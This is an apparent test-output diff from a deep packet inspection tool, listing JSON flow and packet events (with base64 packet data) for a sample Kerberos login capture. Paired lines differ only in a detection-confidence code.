-00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716066779,"flow_last_seen":946716066779,"flow_idle_time":200000,"flow_min_l4_payload_len":1211,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":1211,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946716066779,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1061,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716066779,"flow_last_seen":946716066779,"flow_idle_time":200000,"flow_min_l4_payload_len":1211,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":1211,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946716066779,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1061,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02049{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946716066779,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1231,"pkt_l4_len":1197,"thread_ts_msec":946716066779,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATBSNEAAIARylIKBQMBCgEMAgBYBCUErTilbYIEoTCCBJ2gAwIBBaEDAgENowwbCkRFTllEQy5DT02kEDAOoAMCAQGhBzAFGwNkZXOlggN2YYIDcjCCA26gAwIBBaEMGwpERU5ZREMuQ09NoiEwH6ADAgEDoRgwFhsEaG9zdBsOeHAxLmRlbnlkYy5jb22jggM0MIIDMKADAgEXoQMCAQKiggMiBIIDHuY7uI3R2Pi1qv57duWeT0Ll4JC2eeipRWlDXzGRgxhPo3csJRa2MQMEvzJvL1oxFgEdtem8BOT\/6kzWb7SgboArNNrafrLfN3L4u+T5BoaqtTGVUaavU7Q9+PXGs7LiGo2KgTrLE9qt+cY1M0j0lU9Usd0PsdgWrPvRldW08V7yTjSdeZzs7HXYDclL3UFolUFFr74WVDo0szg1GjBgT4ahuEYLpeRAOIRHBEgonmzDUd0zcVyxdV30Swv8Qy7TlCy+IgTffAIgDMpddVkTIcDLIJ0JiNqXn0DDzQxH9Yr6KUuBA5LJQKX9AWJ51fUFncoJO0jvdHuM4wqFCI+NceJYJFEg3jPRYfcYh06asxCP3RLORRET1NKwFvfA77ge9U3WoEX\/ShdLO4UPhPvozA6BR0RN2ix3lCp+CLahYrZrHQFA5otaYGv\/MOocj2u+kceip4rTKvuuni64LltdFoW71saPJDefyBkyq4TXwAzh2sEU9sZEub65ComHjMNsaUUdYvlvEuACNBk6sSJ1uNRy5smw7C2wY4appKGOCP44crFldENLSwWXv5EICjWiLi6VOGhAoFAaoXg00SAzG+cR\/zVCrFc99Jmtbsdr3FokLiS2tBlQzNQigbx5GS6NDINjhOdVpxzVZrdRKPvaf7gsgKxsKzMaHaYAf4KlUlgU1YXC4qKw3e8nGsBExyBocaQbTV5qJ5sMCx+8k8UVGcVDvBPEZ+JKGyWl97A+5oQv3qGBvVaTWQWFjp12ue\/6+Z1yW\/3G2oAs\/mvRArSQ6XMQxCqqflRrg8ByB+isl2ue39Es\/7Xp2QNNolZudB1g86tZGEtlQE10gMSOSETka\/rtr5bMEnNrzIEXR71jB36f3LlIdysQMXsAvDmayk2i7xRPsWOPX8TeRAhxvusm+YwAO3gHOBqoERHXUp7FSwtegA+gG1K1MstH7XbrzDU8+2demlkwll9BjirDx0Dabc6GZmQ7FXTr7\/z+u6H14kdj0b9o2RAWTXwOuUBNLVqGWOCd4P++xwERP8qVc2sFAlXiY84kqVhDZjtqg8mUOqaB9jCB86ADAgEDooHrBIHocOAk\/bIykxmFVuY8onVUzz3TbQpUjpIVkGh3RwudGhk8eZadxEVeX9b8cVUYOAa7jQ51P0iHVewP69h7n62lsV7hoaksBFdS6q+5Ad39W06ORHIykCaNTr1ypMQv23OFrKHoU250yqFUu18TCQYph5jY\/L\/0UQND5rBixb9iOLAPk3Z\/C8J7bJIlTV8arD8uZRGaxhSVbUWv0f9+jTl5QGEQtPFBefjh5a9NhX+VO\/Ce7sihoYBD+6XCD31JszlJqPyIXPEsJNC4ZKHS5qDVxSfmN3+WvFejiMn\/QZucrbJXOsyF6B\/PtA=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067396,"flow_last_seen":946716067396,"flow_idle_time":200000,"flow_min_l4_payload_len":1223,"flow_max_l4_payload_len":1223,"flow_tot_l4_payload_len":1223,"flow_avg_l4_payload_len":1223,"midstream":0,"thread_ts_msec":946716067396,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1065,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02093{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946716067396,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1265,"pkt_l4_len":1231,"thread_ts_msec":946716067396,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATjAKAAAIAREmIKAQwCCgUDAQQpAFgEzxZdbIIEwzCCBL+hAwIBBaIDAgEMo4IEQDCCBDwwggQ4oQMCAQGiggQvBIIEK26CBCcwggQjoAMCAQWhAwIBDqIHAwUAAAAAAKOCA31hggN5MIIDdaADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggM9MIIDOaADAgEXoQMCAQKiggMrBIIDJ4RwpyphOLnHVkqOX4TTLL\/NUu5uT4ndfXvtKiq11NdLWnrJ\/RkaBODS8WDzyOM7DDP1nd4bhExpZR7pwXGASTRBEAN2odNkmh0jdzKuWtjMKtGp2DVyj42cmc+6QXzFWbsc0ciQP3vX8gzqfjlXBbC1PHZQyiL5U92grWlcO9uxZYpsjFPmNRnvg0nt\/xD\/k\/z4alVwZr0+jgG3JmOMUN8YRvUhkqjEGbONBjsYyGrmE3Ae0sFLvgfCOtnaLCrmhDhfe6BckUxCG82cbCE05wDmkFQMzXxqBoDs+mBuGqcT2zUGCvofrim8qNCpUczCV87ZvFqyfleMqYFe8e74u3mmQ1fcSD61TIWvJhyWnsUWMoWSWuBoII6ZhenvLr4HL+5mHWC72kqVQz9srg6QHIqNzvrQ7DgEM\/9XRH0dV9gOEWIuSthdUZx4CSs\/82\/S+XpSQN0F1uaTpfOixCuhaME3tB6ucfpVxhhgNMKhV2MQ++9ZC3EDiLlTWn4p63bFb72BHZJAt27DvsIEwI3bkwnuFtL4Fk2gSwnnirqglXx1m4xMxxPKkc7ZvgGGVTHW+IDRr1tOhGD17PoVtYxucTrKmfY69Rdv\/9z0bIPLo0VviWdk3sc9k8HjkQfgpwDnWjCD0VKBIIGg9uiFiErVIRTHer77I95UgN9tBSgAokTW7wNSkoBbBuZGGNUfm0nSFo9rOK9SplQWLL+O5JKrHS69WKIOLFB87yt324276h29cTgvZcIV36teGUEgKDcfX+k5iTX2Ph5V4lxgR97jmS0ytqJ0+s2djuGYjPQuqqEtnqVJXfNpS3XRcFPedWkvKKv1SNplx7iO7hPF7zt\/2aXT0fpNbqBHcMgWJof+k8D5h2RIfUTFFMuM19MydzZK7SdkK0tdWtwN8y5ShlAyusgKRFz5Z8uWh4fgC8O0CO7X3OIwQWHtE1WIPGgNqkoWQsz5hV5mZIHpBVIFMhCXvcvJflISym1AUJsX9K7DD3lNvPS5ksi8gC0X3jNrfYoqxIoSkg01gi4ZcoJfT2HjYcCNwIx3bgN8W82fdKPJYczHHa8jvqKd\/aSBjDCBiaADAgEXooGBBH\/HpWldNX5jKKjLvfGYHFT0ZakiaMIF9M2fyfBeqTcs6p0k76sFAq5yzenyFaJ0etw2gwIKD+jFWzd\/K9hX5c\/ch5FA4bonO9kqluVDS7YqtQXP\/33gATlhiutrL3dBqmpYh5ethifkqz2FdTCpLULEKaDAUyQEhROWLkaHuux6pG8wbaAHAwUAQIAAAKIMGwpERU5ZREMuQ09Nox4wHKADAgECoRUwExsEY2lmcxsLVlBDLVcySzNFTlSlERgPMjAzNzA5MTMwMjQ4MDVapwYCBAudSMaoGTAXAgEXAgL\/ewIBgAIBAwIBAQIBGAIC\/3k="} -00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067396,"flow_last_seen":946716067396,"flow_idle_time":200000,"flow_min_l4_payload_len":1223,"flow_max_l4_payload_len":1223,"flow_tot_l4_payload_len":1223,"flow_avg_l4_payload_len":1223,"midstream":0,"thread_ts_msec":946716067396,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1065,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067396,"flow_last_seen":946716067396,"flow_idle_time":200000,"flow_min_l4_payload_len":1223,"flow_max_l4_payload_len":1223,"flow_tot_l4_payload_len":1223,"flow_avg_l4_payload_len":1223,"midstream":0,"thread_ts_msec":946716067396,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1065,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02052{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946716067396,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1234,"pkt_l4_len":1200,"thread_ts_msec":946716067396,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATESNcAAIARykkKBQMBCgEMAgBYBCkEsGcXbYIEpDCCBKCgAwIBBaEDAgENowwbCkRFTllEQy5DT02kETAPoAMCAQGhCDAGGwR4cDEkpYIDfGGCA3gwggN0oAMCAQWhDBsKREVOWURDLkNPTaIeMBygAwIBAqEVMBMbBGNpZnMbC1ZQQy1XMkszRU5Uo4IDPTCCAzmgAwIBF6EDAgEJooIDKwSCAyftJnERJzVnG2FjBXv2U9MTtX58YaXMNT0ScBgBVqkhN64qGvv84Pf1ObDM+s5\/7xfs69pcxVSNfMpOtnq00ChBKYCg6WQIFdYhy22Ep2Cizn5cKMBVuAG\/NuHsuLJ2DKtQnMUqRPG3wDVMDbOsNcJFD1TqSuL8xvADsNggjK12IANMjIyh+sJrZLgBfLKeKuRLc6CVI5kLNyweATyv5GksOsy8+N6dZWMZjNFFUbBH3kLeZKWKtVmsK6gw6wSERuz\/+3yDPEj+zyGf1EYpgbb2nSIQMwDGNLmrh8J0gvwaTXzBO+HpwgkkK5hqRUU3Gh2LZoSwTJywNoKlB0uioI2dYYgi53kMU6eV7HPsIhwqgnQH\/VjXP+fdL6rY34zV8Ix3FkpUhnvHV7S70+LIJfSlm94LyHD71pBZaJhv2PqAnfgtxoztCauzMJhBBCkSLART0AzGBfUZCBXrOoK3J\/fl6W0KIiuMNaW1CdDLAKootzRrEjIZAxwMkGf5h9U8Cc1biAX43B+rEhcYJlZXCDKP5FkMcwHD2yd1RQbu0aDeJd9ZRMKGfzSjxVnFfOI6nwigXn7HZwncWVOLdSbSDe\/3vkHpqAHkuXxLvShbd7wOAHz6Xp8UCAnjMyxVn5HMLSB3VTHTzdrDQVV+LSjsUlie7Nr6foLTfH2RZwZH95rqftf6gY+uzgyGO1llMR5ZyQybRjUgaNa8Dx6PRsLt3MydcfnKdmjC1g98Ci82Brt5fpKkvjm+FyIGnihml2edVqypt1tBGPdXRsI3VN2W+\/9Sg3cd1QhUsY0JL00GSAojlMDdD4viHaN3feeU2ekPZNg3MHKcM9XUHGdBDpEH\/DXfDBgYWovFuvMwDZtFLYS4mbZRK5b\/nAmpjQH5HNq5HK6mDcJEL\/KLygzLfHwXh3gvtg+zmtag79pBu0u038AGWTB9pYqfDKf5XiURp3mqCKbx4vRMD+GiJBsjWMtzPFny04eCIGBgCqZh65T+T1d2G0Bt4Db+zCE8XI29i8CzvhaO2A7HO6lu1aTRNF8jHlWdkEbWxO2MjLi\/xIJPW+fKU+EoYXLMxAamgfIwge+gAwIBF6KB5wSB5GGl5Jtrs7Bi5L6fEmLsvrIK1dI4nSOmAlrWIBVE3N0Shv8xGKijDSbUX\/fp936uFQnR41x\/u+U61J43Jj7bbriEo+xbbMfPbVIxcGE2B\/9UEzRGPJBxElU3ARP\/c4wC96Nz6oDy00ed8+zipIxBSWuXCVeF7tjhslAjXGq4glP1AeL9B1SLH83sEBO9baZtQHriwlfEXSKnmRAoLso8++0XpvGg1GAhr9GnPsRdwMoLPXqQYLvKNNn4oQT46yQbYLCa+wXkdaumY8ACbsgGvvtN1vbO+VN5vDO+RkeY4HyXJ7\/mHw=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067473,"flow_last_seen":946716067473,"flow_idle_time":200000,"flow_min_l4_payload_len":1219,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":1219,"flow_avg_l4_payload_len":1219,"midstream":0,"thread_ts_msec":946716067473,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1067,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02087{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946716067473,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1261,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1261,"pkt_l4_len":1227,"thread_ts_msec":946716067473,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATfAKUAAIAREmEKAQwCCgUDAQQrAFgEy\/Q0bIIEvzCCBLuhAwIBBaIDAgEMo4IEMTCCBC0wggQpoQMCAQGiggQgBIIEHG6CBBgwggQUoAMCAQWhAwIBDqIHAwUAAAAAAKOCA2xhggNoMIIDZKADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMsMIIDKKADAgEXoQMCAQKiggMaBIIDFnaHOkbe3Ft95M1wKu8wrnnL2KoXK50Wfms4lwl+7nIzTWt\/TBTBxetLCu0b6OiVj3UpYznp3lazrMq98Qwi3aS0sEdZBoJs+Etqw0r7qbOiqGfIzfY5WW7lW95ehl68DOwN7G\/ctJKk8AVM30BgdXD8tz49IVb5LvH8kWVdyLTL7dDroB1zpLEnsskNCGiPKC2kvI4rVQFX\/skMLVm0vrv\/AnhykPJFywmuBCVaX4ilWguDR\/hhedFfzOYZ0xf7kVQmFePGaBfPtyf2tWMm316XiQ6a0ddMjedbQTEPUEaIPhU11lAXVTRXuGNNrbinzU88d0vpPunmiXEQ46Zb2aBwhA2PddlJfkphuRTiKTMYIcDx\/1mQSbo6IMs5BzF09EwRlqL20WWEy+tJbg8F96jQFX9ZfusZkqo2\/Ymtt2KIXO2vcTHWCJfKNWi2oHePkmjQVNqV44BDHKJhg2yYGzOpsCLcIH9xI3jIsbhcV3lnOJelJiIh\/BOztlBncxQJDGM8Ss5lpzuieNTaBQOQBzYsANr2gDw7i5E2tKUZxxU28uYbVQUK6KZjtJp0woRjxeXkug7EiwanRJ+ruwFN4641BrWk2WV7znZLMnOxd9Ixgq276dbW3uk8XghmBk5iO9uBY9B6bl2XBCrn0zJxWO550J7YNhBLCWnZolKhh691S4S\/sMyb9cBhQt9YOq11SPy9kRuQfEqcmeMSn67AgOzJ8mzxQ8a3rs4hfqkn1jH+UhGi1xla+MUNFmVkVcF\/s3a9sERXKT\/GEeYJDkvNw+esHfCK4jalR0pA558BA3fanPrnNu74qdrmsUgOhPibVBiVBOhTvitLl0hsJU5z6U77MFSX4UMd9nw2kPOVPhabSvF2baihVP5t9x+qShNJPWM56UisG6Ab7JzsId2uQf1lTt49iVnnhmjdWddhTtm47iqqL0nJrz7QZtWxYyMQTTtuJpTJCO76PmTywwSdY3tKlhuq3MxMZlzDeglX6VXTiBXGqdqJOfHm8VsI+LTATS2a9Dxo3ZxAgK9aL5NMKTnSmEBKpJmkgY4wgYugAwIBA6KBgwSBgE+CBwcCA3wjmscZf19xzqPpSKLPcLc7F\/pta9XqA44Uly8KztoJtx1T\/S3J5MszKKWl3sa1nSdS6nEargLzVPyFuFPIKFdT8js+0j5l0she3eftmHpSOeDKPNGguEmqAfcNfIiRmNphBpgZxpQSbrNAgDhiogKgyjFF5rfKXwE1pHoweKAHAwUAQIAAAKIMGwpERU5ZREMuQ09NoykwJ6ADAgECoSAwHhsETERBUBsWdnBjLXcyazNlbnQuZGVueURDLmNvbaURGA8yMDM3MDkxMzAyNDgwNVqnBgIEC6QO6qgZMBcCARcCAv97AgGAAgEDAgEBAgEYAgL\/eQ=="} -00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067473,"flow_last_seen":946716067473,"flow_idle_time":200000,"flow_min_l4_payload_len":1219,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":1219,"flow_avg_l4_payload_len":1219,"midstream":0,"thread_ts_msec":946716067473,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1067,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067473,"flow_last_seen":946716067473,"flow_idle_time":200000,"flow_min_l4_payload_len":1219,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":1219,"flow_avg_l4_payload_len":1219,"midstream":0,"thread_ts_msec":946716067473,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1067,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02067{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946716067513,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1247,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1247,"pkt_l4_len":1213,"thread_ts_msec":946716067513,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATRSN8AAIARyjQKBQMBCgEMAgBYBCsEvSnpbYIEsTCCBK2gAwIBBaEDAgENowwbCkRFTllEQy5DT02kEDAOoAMCAQGhBzAFGwNkZXOlggN+YYIDejCCA3agAwIBBaEMGwpERU5ZREMuQ09NoikwJ6ADAgECoSAwHhsETERBUBsWdnBjLXcyazNlbnQuZGVueURDLmNvbaOCAzQwggMwoAMCARehAwIBCaKCAyIEggMeZ+KqfWvHOiOlvE9U+\/Ap34+Yt57qkqs1sAkSCSkL4e+hCYvkF8IUKlNxjuJw+7aJnQYXbcAu8nj\/MZhAr8\/AQDDRGhb7NmunEZ8MP2jGdsJGpucl0GgoDcxhaZmF1A42v9zW3pYZJ3UBJ\/NhLFn5nPJv4n4xm+DhSCPGMJ2ELHdugapK4G6h+KxNz3a7XkoTRAyq1IOiXos\/ZgpNuA71IjNF8wd79Q9NihpYsbMj99UkLQGg+GNZ7anXXyZI37LVqkETaT3MiD3wW8JGRaTCo9KqZMDmM6RXIQV44jn+bs49OWkhbut7joQbi5nc8CBEZMHt6YGc9PNZVW5rt9fkNjpZvaTIpt9ihZ04BLsGbj+r5YMmqKf4W+tRo79Atk2aXqrFfQzORmO7xaor40bgOryiDneGjjHxjO\/5QleLF7irh6shtpF6Pn2svcJalC1MnlAHVsEjB9vqlLFkb0c3P9kGCP\/R82P4mEHKdTJBcv8pNJexa6qYwr2lBqDYghon+AlS91wyvXv9KIjmq\/xpzHy4GDuVTfCb+OvpUgtXBWhzgnLJD4UXMbtQTtrXmldZAqwP7VBZyLuoU8ofEOdN62q0FUwXGThyIa+U7S5FAF3Q9brpCuLQVgQfL+wd4hMDQNB1I+a3VnrsEXXBhb\/jrZSppMn8yfrFxKORmdJBXvp9xYUlgRZ5BQKrYfpuuHK0hAPnxe4g5MFMi3OQ6bpel\/YsFKJlTmHXK0WpbcIGWtmKdpT6spw96zcwDv4ApZLswgucQljrD3IDu46fxN9dcf53+h+KPUMzRs0dhAmptPJAxU559MGsf+PAXSMH4cC1ztoftxzGM9De1qctOOrMoL4srK0Au7+bF3iig3d3AXdhA+kWkv+dQJcTdFZycTKiVnx\/PKFG8CMFKL9OnxCPbFNn4PALfTRcGmA+tiev3SoOAZ1dzrKgqmw\/HQQlXYgqfl8o7ybmqflImt2PMqKiBN56dMsVpJ5TOUqnqCRIOVhxnWNL8o5AwGSVbpJs3GkXcsGfeXlozdCO74IWjMaPJoCt6QdSriBmpnbyRb3jpoH+MIH7oAMCAQOigfMEgfCUTXHX1aELiQlzKCsczFe+C2IqPAVGDFuPZzq+owK6ABcQxAODKKz5mwDrc9QttnnbgOci\/9zrjmZqaH+P5gUo2fja8sx3prrxiY4cFcT1nNZarJllSgUase3wPlmtd3i1yQqAsDzF5bEwq1nO4VnA12YySXQVzxwv3HQD6oweqLHEZ3oU4VeZG\/dQArj1xD6pvQRf3o8u5a4PxiyC32tuMj0FVsdoB8O7azCA2z4GdVx1QCbiZECr0pFHPOzVN9bWYT0DYM5+ia9ZccCJY\/vgfXRXSZ2ZyLLSAPvAdjJQEV6+TmTizQnNsMr6i2+HGTI="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067526,"flow_last_seen":946716067526,"flow_idle_time":200000,"flow_min_l4_payload_len":1209,"flow_max_l4_payload_len":1209,"flow_tot_l4_payload_len":1209,"flow_avg_l4_payload_len":1209,"midstream":0,"thread_ts_msec":946716067526,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1068,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02070{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946716067526,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1251,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1251,"pkt_l4_len":1217,"thread_ts_msec":946716067526,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATVAKkAAIAREmcKAQwCCgUDAQQsAFgEwZU2bIIEtTCCBLGhAwIBBaIDAgEMo4IEMTCCBC0wggQpoQMCAQGiggQgBIIEHG6CBBgwggQUoAMCAQWhAwIBDqIHAwUAAAAAAKOCA2xhggNoMIIDZKADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMsMIIDKKADAgEXoQMCAQKiggMaBIIDFnaHOkbe3Ft95M1wKu8wrnnL2KoXK50Wfms4lwl+7nIzTWt\/TBTBxetLCu0b6OiVj3UpYznp3lazrMq98Qwi3aS0sEdZBoJs+Etqw0r7qbOiqGfIzfY5WW7lW95ehl68DOwN7G\/ctJKk8AVM30BgdXD8tz49IVb5LvH8kWVdyLTL7dDroB1zpLEnsskNCGiPKC2kvI4rVQFX\/skMLVm0vrv\/AnhykPJFywmuBCVaX4ilWguDR\/hhedFfzOYZ0xf7kVQmFePGaBfPtyf2tWMm316XiQ6a0ddMjedbQTEPUEaIPhU11lAXVTRXuGNNrbinzU88d0vpPunmiXEQ46Zb2aBwhA2PddlJfkphuRTiKTMYIcDx\/1mQSbo6IMs5BzF09EwRlqL20WWEy+tJbg8F96jQFX9ZfusZkqo2\/Ymtt2KIXO2vcTHWCJfKNWi2oHePkmjQVNqV44BDHKJhg2yYGzOpsCLcIH9xI3jIsbhcV3lnOJelJiIh\/BOztlBncxQJDGM8Ss5lpzuieNTaBQOQBzYsANr2gDw7i5E2tKUZxxU28uYbVQUK6KZjtJp0woRjxeXkug7EiwanRJ+ruwFN4641BrWk2WV7znZLMnOxd9Ixgq276dbW3uk8XghmBk5iO9uBY9B6bl2XBCrn0zJxWO550J7YNhBLCWnZolKhh691S4S\/sMyb9cBhQt9YOq11SPy9kRuQfEqcmeMSn67AgOzJ8mzxQ8a3rs4hfqkn1jH+UhGi1xla+MUNFmVkVcF\/s3a9sERXKT\/GEeYJDkvNw+esHfCK4jalR0pA558BA3fanPrnNu74qdrmsUgOhPibVBiVBOhTvitLl0hsJU5z6U77MFSX4UMd9nw2kPOVPhabSvF2baihVP5t9x+qShNJPWM56UisG6Ab7JzsId2uQf1lTt49iVnnhmjdWddhTtm47iqqL0nJrz7QZtWxYyMQTTtuJpTJCO76PmTywwSdY3tKlhuq3MxMZlzDeglX6VXTiBXGqdqJOfHm8VsI+LTATS2a9Dxo3ZxAgK9aL5NMKTnSmEBKpJmkgY4wgYugAwIBA6KBgwSBgNeoX1w44rBG4C\/VapcvnoZR3r28u32Kb2ufqFlDeRBviPxhnH2sl\/neUX6tzO4Fk6hSlL5WBXV+EulgZYNYyiRx5ceWwlRK69YQjwPipIJ+arQYW+UcF4xjMryagpJPCl4lEAT9VaABN1keDumZpmnf0Qe1QvOEVx1AY35W6Y1upHAwbqAHAwUAYIEAEKIMGwpERU5ZREMuQ09Nox8wHaADAgECoRYwFBsGa3JidGd0GwpERU5ZREMuQ09NpREYDzIwMzcwOTEzMDI0ODA1WqcGAgQLr8wWqBkwFwIBFwIC\/3sCAYACAQMCAQECARgCAv95"} -00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067526,"flow_last_seen":946716067526,"flow_idle_time":200000,"flow_min_l4_payload_len":1209,"flow_max_l4_payload_len":1209,"flow_tot_l4_payload_len":1209,"flow_avg_l4_payload_len":1209,"midstream":0,"thread_ts_msec":946716067526,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1068,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716067526,"flow_last_seen":946716067526,"flow_idle_time":200000,"flow_min_l4_payload_len":1209,"flow_max_l4_payload_len":1209,"flow_tot_l4_payload_len":1209,"flow_avg_l4_payload_len":1209,"midstream":0,"thread_ts_msec":946716067526,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1068,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 